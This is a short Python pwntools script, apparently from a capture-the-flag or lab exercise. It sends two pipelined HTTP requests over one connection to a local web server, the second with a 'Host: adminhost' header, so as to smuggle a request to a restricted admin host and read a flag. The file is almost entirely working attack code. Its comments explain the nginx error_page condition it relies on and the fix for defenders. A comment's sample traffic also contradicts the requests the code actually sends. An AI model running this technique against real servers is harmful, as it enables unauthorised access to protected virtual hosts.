import pwn
# Restrict pwntools output to errors so only the server's replies are shown.
pwn.context.log_level = 'error'

# A single TCP connection to the local web server on port 80; everything
# below is written to this one connection.
remote = pwn.remote('localhost', 80)

# Two GET requests sent back to back on the same connection. They are
# identical except for the Host header: localhost first, adminhost second.
# Each request is closed by an empty line.
for request_line in (
    'GET / HTTP/1.1',
    'Host: localhost',
    '',
    'GET / HTTP/1.1',
    'Host: adminhost',
    '',
):
    remote.sendline(request_line)

# Attach the terminal to the connection so the responses can be read.
remote.interactive()
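# The traffic on the connection looks like this:
# GET /a HTTP/1.1
# Host: localhost
#
# GET /flag.txt HTTP/1.1
# Host: adminhost
# The second request is the one being smuggled.
# NOTE(review): the script sends `GET /` in both requests, so the paths shown
# here do not match the code as written.
# This only works because the server uses an absolute http://url in its
# error_page directive. For a defender, that is the setting to audit: by the
# statement above, an error_page that points to a local URI instead of an
# http:// URL removes the condition this relies on.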